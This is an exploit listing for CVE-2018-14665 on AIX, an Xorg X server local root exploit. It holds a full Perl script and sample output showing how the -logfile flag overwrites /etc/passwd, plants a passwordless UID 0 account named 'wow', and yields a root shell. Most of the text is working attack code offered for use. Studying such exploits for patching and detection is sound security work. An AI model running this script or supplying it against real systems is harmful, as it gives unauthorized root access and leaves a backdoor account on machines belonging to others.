# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation # Date: 29/11/2018 # Exploit Author: @0xdono # Original Discovery and Exploit: Narendra Shinde # Vendor Homepage: https://www.x.org/ # Platform: AIX # Version: X Window System Version 7.1.1 # Fileset: X11.base.rte < 7.1.5.32 # Tested on: AIX 7.1 (6.x to 7.x should be vulnerable) # CVE: CVE-2018-14665 # # Explanation: # Incorrect command-line parameter validation in the Xorg X server can # lead to privilege elevation and/or arbitrary files overwrite, when the # X server is running with elevated privileges. # The -logfile argument can be used to overwrite arbitrary files in the # file system, due to incorrect checks in the parsing of the option. # # This is a port of the OpenBSD X11 Xorg exploit to run on AIX. # It overwrites /etc/passwd in order to create a new user with root privile= ges.=20 # All currently logged in users need to be included when /etc/passwd is ove= rwritten, # else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to ch= ange user. # The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX= , # and is replaced by '-config'. # ksh93 is used for ANSI-C quoting, and is installed by default on AIX. # # IBM has not yet released a patch as of 29/11/2018. # # See also: # https://lists.x.org/archives/xorg-announce/2018-October/002927.html # https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html # https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl # # Usage: # $ oslevel -s # 7100-04-00-0000 # $ Xorg -version # =20 # X Window System Version 7.1.1 # Release Date: 12 May 2006 # X Protocol Version 11, Revision 0, Release 7.1.1 # Build Operating System: AIX IBM # Current Operating System: AIX sovma470 1 7 00C3C6F54C00 # Build Date: 07 July 2006 # Before reporting problems, check http://wiki.x.org # to make sure that you have the latest version. # Module Loader present # $ id # uid=3D16500(nmyo) gid=3D1(staff) # $ perl aixxorg.pl # [+] AIX X11 server local root exploit # [-] Checking for Xorg and ksh93=20 # [-] Opening /etc/passwd=20 # [-] Retrieving currently logged in users=20 # [-] Generating Xorg command=20 # [-] Opening /tmp/wow.ksh=20 # [-] Writing Xorg command to /tmp/wow.ksh=20 # [-] Backing up /etc/passwd to /tmp/passwd.backup=20 # [-] Making /tmp/wow.ksh executable=20 # [-] Executing /tmp/wow.ksh=20 # [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh=20 # [-] Done=20 # [+] 'su wow' for root shell=20 # $ su wow # # id # uid=3D0(root) gid=3D0(system) # # whoami # root #!/usr/bin/perl print "[+] AIX X11 server local root exploit\n"; # Check Xorg is in path print "[-] Checking for Xorg and ksh93 \n"; chomp($xorg =3D `command -v Xorg`); if ($xorg eq ""){=20 print "[X] Can't find Xorg binary, try hardcode it? exiting... \n"; exit; } # Check ksh93 is in path chomp($ksh =3D `command -v ksh93`); if ($ksh eq ""){ print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n"; exit; } # Read in /etc/passwd print "[-] Opening /etc/passwd \n"; open($passwd_fh, '<', "/etc/passwd"); chomp(@passwd_array =3D <$passwd_fh>); close($passwd_fh); # Retrieve currently logged in users print "[-] Retrieving currently logged in users \n"; @users =3D `who | cut -d' ' -f1 | sort | uniq`; chomp(@users); # For all logged in users, add their current passwd entry to string # that will be used to overwrite passwd $users_logged_in_passwd =3D ''; foreach my $user (@users) { $user .=3D ":"; foreach my $line (@passwd_array) { if (index($line, $user) =3D=3D 0) { $users_logged_in_passwd =3D $users_logged_in_passwd . '\n' . $l= ine; } } } # Use '-config' as '-fp' (which is used in the original BSD exploit) is not= written to log print "[-] Generating Xorg command \n"; $blob =3D '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/us= r/bin/ksh\n#' . '\''; print "[-] Opening /tmp/wow.ksh \n";=09=09 open($fr, '>', "/tmp/wow.ksh"); # Use ksh93 for ANSI-C quoting print "[-] Writing Xorg command to /tmp/wow.ksh \n"; print $fr '#!' . "$ksh\n"; print $fr "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n"; close $fr; # Backup passwd=20 print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n"; system("cp /etc/passwd /tmp/passwd.backup"); # Make script executable and run it print "[-] Making /tmp/wow.ksh executable \n"; system("chmod +x /tmp/wow.ksh"); print "[-] Executing /tmp/wow.ksh \n"; system("/tmp/wow.ksh"); # Replace overwritten passwd with: original passwd + wow user print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n"; $result =3D `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0= ::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`; print "[-] Done \n"; print "[+] 'su wow' for root shell \n";